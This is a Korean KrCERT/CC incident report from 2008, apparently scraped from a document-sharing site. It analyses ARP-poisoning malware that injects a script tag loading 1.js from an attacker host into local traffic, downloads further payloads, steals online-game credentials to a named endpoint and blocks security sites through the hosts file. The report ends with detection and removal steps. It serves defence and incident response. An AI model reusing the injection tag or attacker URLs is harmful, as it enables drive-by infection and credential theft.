< F69736F6E696E6720BEC7BCBAC4DAB5E520B0A8BFB020BBE7B0EDBAD0BCAE20BAB8B0EDBCAD2E687770>

Similar documents
*2008년1월호진짜

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

07_alman.hwp

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

#WI DNS DDoS 공격악성코드분석

ActFax 4.31 Local Privilege Escalation Exploit

Windows 8에서 BioStar 1 설치하기

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

untitled

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

Microsoft Word - src.doc

08_spam.hwp

<31305FBEC6C0CCC5DB2E687770>

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

System Recovery 사용자 매뉴얼

행자부 G4C

유포지탐지동향

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

CODESYS 런타임 설치과정

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

PowerPoint Template

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

1

TGDPX white paper

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

1 인증서저장위치문의 원인 증상 인증서가보이지않습니다. ( 인증서선택창에서사용하던인증서가안보입니다.) 인증서가지정된위치에존재하지않거나인증서유효기간이 지난 ( 폐기된 ) 인증서로보이지않는것입니다. 1. 인증서가보이지않습니다. 1-1 인증서저장위치를확인합니다. 교육부 (E

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

신종파밍악성코드분석 Bolaven

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀

Studuino소프트웨어 설치

Endpoint Protector - Active Directory Deployment Guide

SBR-100S User Manual

호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀

1

#HNS-WI 북한의심 APT 공격에대한 Kaspersky 의분석정리

1

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

Red Alert Malware Report

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

Xcovery 사용설명서


Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

(Microsoft PowerPoint - NRMWFKPIIYBC [\310\243\310\257 \270\360\265\345])

Keil Flexlm 라이선스 설명서

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

F O C U S 3 홈페이지를통한악성코드유포및대응방안 FOCUS 고민석 *, 김홍석 **, 이용준 ***, 박정환 **** 최근홈페이지, 웹하드등을해킹하여악성코드를은닉시킴으로써, 접속하는이용자PC를악성코드에감염시키는피해가증가하고있다. 홈페이지, 웹하드는이용자접속이많아

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault

Windows Server 2012

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

제 1 장개요 1 1. 배경 2 2. 가이드목적및구성 3 제 2 장인증서관리미흡악용사례 4 제 3 장코드서명인증서보안가이드 6 1. 인증서관리 7 2. 인증서관리시스템 8 3. 보안업데이트체계 9 4. 침해사고발생시사고대응체계 11 제 4 장코드서명인증서보안가이드항목해

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

ThinkVantage Fingerprint Software

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 - 경유지

05 Agent 수동 업데이트 및 바이러스 검사 명령 실행

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 운영체제의버전확인은어떻게확인하나요? 3 Q5. 보안패치는어떻게하나요? 4 Q6. 보안패치가됐

KARAAUTO_4¿ù.qxd-ÀÌÆå.ps, page Normalize

1

< B657220BBE7BFEBB8C5B4BABEF32E687770>

helpU 1.0

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

ìœ€íŁ´IP( _0219).xlsx

Android Master Key Vulnerability

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

NTD36HD Manual

운영체제실습_명령어

Table of Contents 1. 분석 유포경로 악성파일분석 드롭퍼 A 분석 드롭퍼 B 분석 페이지 2 / 17

Windows 8 Upgrade Step by Step Guide

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

*2월완결

Secure Programming Lecture1 : Introduction

PowerPoint 프레젠테이션

ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성

<C0CCC8ADC1F82E687770>

Security.hwp

목 차 1. 드라이버 설치 설치환경 드라이버 설치 시 주의사항 USB 드라이버 파일 Windows XP에서 설치 Windows Vista / Windows 7에서 설치 Windows

*****

6. 설치가시작되는동안 USB 드라이버가자동으로로드됩니다. USB 드라이버가성공적으로로드되면 Setup is starting( 설치가시작되는중 )... 화면이표시됩니다. 7. 화면지침에따라 Windows 7 설치를완료합니다. 방법 2: 수정된 Windows 7 ISO

슬라이드 1

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

Transcription:

2008. 7. 3 인터넷침해사고대응지원센터 (KISC) 본보고서는 CONCERT 정회원사만을대상으로 KISA KrCERT/CC 가제공하는것으로외부로의유출, 특히웹사이트, 카페, 블로그게시등어떤방식으로든지전재및배포가이뤄질수없습니다.

개요최근 ARP Poisoning을이용한악성코드감염피해사고가빈번히발생하고있다. 많이확인되고있는피해유형은, 웹을통하여악성코드를유포시키고, ARP Poisoning 전용도구를이용하여동일네트워크내에있는다른 PC들을추가로감염시키는유형이다. ARP Poisoning 공격시, 최근에공개된 FlashPlayer 취약점을악용하여악성코드를유포하는경우도확인되었다. 또한, ARP Poisoning 공격으로인하여네트워크서비스장애가발생하는경우도다수확인되고있다. ARP Poisoning 공격의경우, 악성코드감염외에도 DNS 파밍공격및정보유출등공격응용범위가매우넓으며, 피해가발생할경우, 자신의시스템외에도네트워크내의다른사용자들에게도피해를주게되므로주의를하여야한다. ARP Poisoning 공격을통한악성코드감염플로우 o 이번에확인된사례는사용자PC가감염된후, ARP Poisoning 전용공격도구가추가로설치및실행되어, 해당도구에의하여로컬네트워크 (Subnetwork) 내의타취약 PC들이추가로감염피해를입는유형이었다. <ARP Poisoning 및악성코드감염과정 > Step1) 이동식디스크및기타경로를통하여악성코드에감염 Step2) 악성코드에의하여 ARP Poisoning 공격도구가추가로설치. ARP Poisoning 을위한조작패킷발송. - 1 -

Step3) 트래픽가로채기를통하여 HTTP 트래픽에악성 HTML 코드삽입 Step4) 같은로컬네트워크의일반사용자 PC 에서는삽입된악성 HTML 코드에의하여사용자모르게공격자서버로접속이발생하게되며악성코드에감염 ARP Poisoning 공격은로컬네트워크 (Subnetwork) 가공격대상범위이지만, 이번에발견된, 악성코드는 USB 이동저장장치및네트워크공유를통한전파기능도구현되어있어, 타네트워크로감염범위를넓힐수있다. - 2 -

악성코드유포경로및악용된취약점 o 유포경로및악용취약점 < 악성코드다운로드에악용된취약점정보 > 유포경로를추적및이용된취약점을확인한결과, 아래와같이 MDAC 등다수의취약점이악용되고있는것으로확인되었다. - Flash Player ActiveX, MDAC(MS06-014) - 리얼플레이어, StormPlayer( 중국미디어플레이어 ) 1) DPClient( 중국 DapPlayer) 2), GLCHAT( 중국 Ourgame GLWorld) 3) 1) 중국 StormPlayer 취약점 : http://secunia.com/advisories/26749/ 2) 중국 DapPlayer 취약점 : http://secunia.com/advisories/26964/ 3) 중국 Ourgame GLWorld 취약점 : http://secunia.com/advisories/27500-3 -

또한, 피해 PC의인터넷접속로그를기반으로악성코드가감염된경로를추적한결과, 최초 ARP Poisoning에의해인젝션된 1.js 페이지를이용자가방문하게되고 1.js에의해서다중취약점이설정된 index.htm 페이지를방문한다. index.htm에는 MS06-014, 리얼플레이어, StormPlayer( 중국미디어플레이어 ) 4) DPClient( 중국 DapPlayer) 5), GLCHAT( 중국 Ourgame GLWorld) 6) 그리고최근유행하고있는 Flash Player ActiveX 취약점을악용하도록설정되어있다. 피해 PC의경우 MS06-014가패치된상태이고기타 ActiveX 가설치되어있지않았으나, Flash Player에대한보안업데이트 7) 가제대로이루어지지않아악성코드감염피해를당하게된것으로추정된다. Flash Player 버전이 9.0.115.0 이하인것은모두취약점을가지고있다. 공격이성공하게되면 1.exe 악성코드가다운로드되어실행되게되며, 다수의코드가추가로설치되게된다. o 악성코드설치과정 1.exe 악성코드가실행된후, 추가적으로다운로드및생성되는파일명과생성순서를정리하면다음과같다. 4) 중국 StormPlayer 취약점 : http://secunia.com/advisories/26749/ 5) 중국 DapPlayer 취약점 : http://secunia.com/advisories/26964/ 6) 중국 Ourgame GLWorld 취약점 : http://secunia.com/advisories/27500 7) KrCERT/CC 보안공지 : Adobe Flash Player 다중취약점보안업데이트권고 (2008/4/11) - 4 -

o 설치후의주요피해증상 1차악성코드 (csrss.exe) 에감염되게되면, 해당감염코드에의하여추가로게임계정을유출을위한악성코드와대규모감염을위한 ARP Poisoning 도구가설치되게된다. 따라서, 감염사용자PC에서는던젼앤파이터등의온라인게임계정정보유출피해가발생할수있다. 또한 ARP Poisoning 공격으로인하여, 로컬네트워크에서네트워크서비스장애가발생할수있다 2차다운로드코드중 4.exe ~ 10.exe 는테스트시간대에실제다운로드는되지않는것으로확인되었다. 공격자가의도할경우는게임계정유출악성코드외에도악의적인행위를하는추가코드를 4.exe ~ 10.exe 파일형태로유포하는것이가능하였을것으로보인다. - 5 -

o 악성코드별상세분석 1.exe가실행되면, 다수의파일이추가로생성되는데, 주요악성코드에대한분석내용은다음과같다. csrss.exe 악성코드 - 6 -

- ARP 공격전용도구설치및실행 arp 공격수행을위하여, wincap library(wincap.exe) 파일과 arp 전용공격도구 (arps.com 또는 arps.exe) 를설치하고실행한다. 실행시 <script src=http://makrea.com/img/btn/1.js></script> 를인자값으로주어로컬네트워크통신트랙픽에악성 URL을인젝션한다 <arps.exe 실행시전달하는인자값코드 >. - 이동저장매체및네트워크공유폴더암호취약점을통하여자기전파 - 자기보호기능아래와같은자기보호기능이구현되어있다.. Fwmon, 방화벽등보안프로그램을종료, 분석도구실행방해. %SYSTEM%/drivers/etc/hosts 파일변조를통하여, 특정보안사이트접속을방해 < 접속방해사이트리스트 > www.360.cn, www.360safe.cn, www.360safe.com, home.ahnlab.com www.rising.com.cn, rising.com.cn, dl.jiangmin.com, jiangmin.com www.jiangmin.com, www.duba.net, www.eset.com.cn www.nod32.com, shadu.duba.net, www.kaspersky.co.kr, www.viruschaser.com, kaspersky.com.cn, virustotal.com www.kaspersky.com, www.cnnod32.cn www.lanniao.org, www.nod32club.com, www.dswlab.com bbs.sucop.com, www.virustotal.com, tool.ikaka.com 360.qihoo.com, qihoo.com, www.qihoo.com, www.qihoo.cn 9u9u9.cn - 아래의 URL에접속하여, 악성코드를추가로설치. www.makrea.com/img/btn/wm/wincap.exe www.makrea.com/img/btn/wm/arp.exe www.makrea.com/img/btn/1.exe ~ 10.exe 또한, makrea.com/img/btn/tj/ct.asp 에 MAC주소와버젼정보를전송 wsock32.dll 악성코드 - 7 -

. 특정인터넷사이트로부터악성코드를추가로다운로드하여설치. 접속하는 URL 은 http://makrea.com/wm/mm.exe 이며, 현재다운로드되지는않는다. ( http 404 메시지 출력 ) 다운로드사이트 : http://makrea.com/wm/mm.exe arps.com (arps.exe) 악성코드 - ARP Poisoning 을위한전용도구. 공격자는 arp.exe를통하여로컬네트워크에존재하는서버또는 PC를대상으로아래와같은공격이가능하다 데이터유출해커는로컬네트워크내에암호화되지않은상태로전송되는데이터들을캡쳐할수있음 <Arp Poisoning을통하여 FTP 접속 ID, Pass 를유출하는예 > 악성코드유포해커는트래픽 Payload 변조및악성 html 코드삽입을통하여, 악성코드유포목적으로활용할수있음 < 악성 html코드삽입예 > DNS 파밍공격 DNS 응답트래픽변조를통하여 DNS 파밍에악용할수있음. 통신속도제한해커는사용자통신속도를제한할수있음 2.exe, 3.exe(=windf.EXE) 악성코드 - 8 -

. 온라인게임계정정보유출 메이플스토리, 던젼앤파이터등온라인게임계정을유출한다 < 악성코드에코딩되어있는게임계정정보관련문자열예 > 계정정보는아래의사이트로유출된다. http://www.518lls.com/8888/sendmail.asp?tomail 정보유출예 < 사이트접속및계정정보입력예 > < 입력된사용자계정정보유출예 > 기타 - 9 -

. wincap.exe: ARP Poisoning 공격도구인 arps.exe 실행을위해필요한 dll 파일을설치한다. ARP Poisoning을통한악성코드감염공격의위험성 o ARP Poisoning을통한악성코드감염공격유형은서버팜지역에서공격하는경우와 Client 사용자지역에서공격하는경우로나뉠수있다. 각각의경우에대한공격특성및위험성을살펴보면다음과같다. 서버팜지역에서악용되는경우는, 공격환경구성을위하여서버팜내의취약서버찾아해킹해야하는과정이필요하다. 그러나일단공격자가취약서버를찾아공격에성공하게되면, 해당서버팜에서운영되는모든서버에접속하는모든이용자들이공격대상이될수있어위험성이높다. < 서버팜내에서 ARP Poisoning 공격 > 클라이언트지역의 ARP Poisoning 의경우, 피해범위가해당PC가존재하는로컬네트워크로한정되나, 비교적보안방어조치가허술한한대의클라이언트사용자PC를해킹하는것으로도가능해지므로발생빈도가높다. 클라이언트지역에서, ARP Poisoning 공격으로인하여네트워크장애가발생하는사례도많이확인되고있다. <Client 지역에서의 ARP Poisoning 공격 > - 10 -

감염확인방법 o 감염과정에서다수의파일을다운로드및설치하므로컴퓨터의동작이순간적으로느려짐. 특히이후에네트워크응답이지속적으로늦어지거나네트워크장애가발생하면감염을의심할수있다. o 동일한로컬네트워크내다른 PC들의 ARP 캐시테이블에감염의심컴퓨터의실제 MAC 주소가아닌게이트웨이의 MAC 주소엔트리가있을경우, ARP Poisoning 공격악성코드에감염되었을가능성이크다. 윈도우에서 MAC 주소및 ARP 캐시테이블확인방법은다음과같다. 1 윈도우의시작버튼클릭 2 실행창을열고 cmd.exe를실행 3 명령프롬프트에서 "ipconfig /all", "arp -a" 명령입력 o 악성코드설치과정에서생긴다음의특징적인파일들이있을경우감염을확인가능하다. - C:\Windows\Tasks\ 폴더에 csrss.exe 파일등 - 다수의폴더에 wsock32.dll이숨김파일로존재할경우 - C:\WINDOWS\system32\drivers\etc\hosts 파일이변조된경우 - C:\Program Files\ 에글자를알아볼수없는폴더 치료방법 - 11 -

참고사항 : 이번에확인된악성코드는자동화제작도구를통하여, 제작된것으로보인다. 제작시의도구옵션값에따라, 타기능들이추가될수있으므로, 다른옵션조건으로제작된샘플의경우치료방법이다를수있다. 1 안전모드부팅후, C:\Windows\Tasks\ 에사용자가만든작업파일을제외한모든파일을삭제 2 C:\ 하위의모든폴더에서 wsock32.dll 파일을검색하여시스템파일 (30KB 이상 ) 을제외한악성파일 (16KB) 을모두삭제 - 12 -

윈도우시스템파일 (C:\WINDOWS\system32\wsock32.dll 등 ) 을삭제하면시스템오류가발생할수있으므로주의요망 3 메모장으로 C:\WINDOWS\system32\drivers\etc\hosts 를열어서모든내용을삭제후저장 - 13 -

4 C:\WINDOWS\system32\drivers\windf.* 파일을삭제 5 %USERPROFILE%\Local Settings\Temp\ 혹은 %TEMP% 폴더에서 *.pif 파일을삭제 - 14 -

6 C:\Windows\system32\ 에서 wincap.exe, arps.com을삭제하고 WinPcap 을설치한적이없다면추가로 Packet.dll, WanPacket.dll, wpcap.dll을삭제 7 C:\Windows\ 에서 MicroSoft.pif 과 MicroSoft.vbs 파일을찾아서삭제 - 15 -

8 C:\Program Files\ 에서글자가깨져서보이는폴더를삭제 9 레지스트리편집기 (regedit.exe) 에서 03AA4538A6A8로검색하여상위키모두삭제 - 16 -

10 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run에서 windf.exe 항목을삭제 11 HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ 에서 hackshen.vbs로검색하여해당키삭제 - 17 -

12 시스템재부팅후 C:\Windows\system32\ 에서 03AA4538A6A8.dll 과 03AA4538A6A8.exe 삭제 13 아래 Adobe 웹사이트를통해서현재설치된 Flash Player 버전을확인한다. URI: http://www.adobe.com/kr/support/flashplayer/ts/documents/tn_15507.htm - 18 -

14 Flash Player 버전이 9.0.115.0 이하인것은모두취약점을가지고있기때문에사용하는웹브라우저를열고아래 URL 를입력하여업데이트를한다. http://www.adobe.com/shockwave/download/download.cgi?p1_prod_version=shockwaveflash < 참고 > [KrCERT/CC 2007.06 - ARP Spoofing 공격분석및대책 ] /unimdocsdownload.do?filename1=tr20070704_arp_spoofing.p df&docno=tr2007001&dockind=2 [KrCERT/CC 2007.02 - ARP Spoofing 기법을이용한웹페이지악성코드삽입사례 ] /unimdocsdownload.do?filename1=in2007003.pdf&docno=in20 07003&docKind=3-19 -

2024 © docsplayer.org 개인정보보호 | 약관 | 지원